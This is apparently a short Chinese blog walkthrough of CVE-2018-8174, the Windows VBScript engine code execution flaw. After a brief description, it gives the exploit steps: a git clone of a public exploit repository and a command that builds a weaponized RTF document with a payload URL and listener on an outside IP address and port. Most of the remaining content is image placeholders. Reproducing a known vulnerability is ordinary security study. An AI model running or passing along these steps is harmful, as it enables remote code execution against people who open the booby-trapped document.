CVE-2018-8174

  1. 漏洞描述:
    1. 操作

漏洞描述:

CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码

操作

image.png
image.png

image.png
这里是先创建的CVE文件
克隆的命令:git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

python CVE-2018-8174.py -u http://47.103.97.200/exploit.html -o msf.rtf -i 47.103.97.200 -p 19132
image.png
image.png
image.png
image.png
image.png
image.png

page PV:  ・  site PV:  ・  site UV: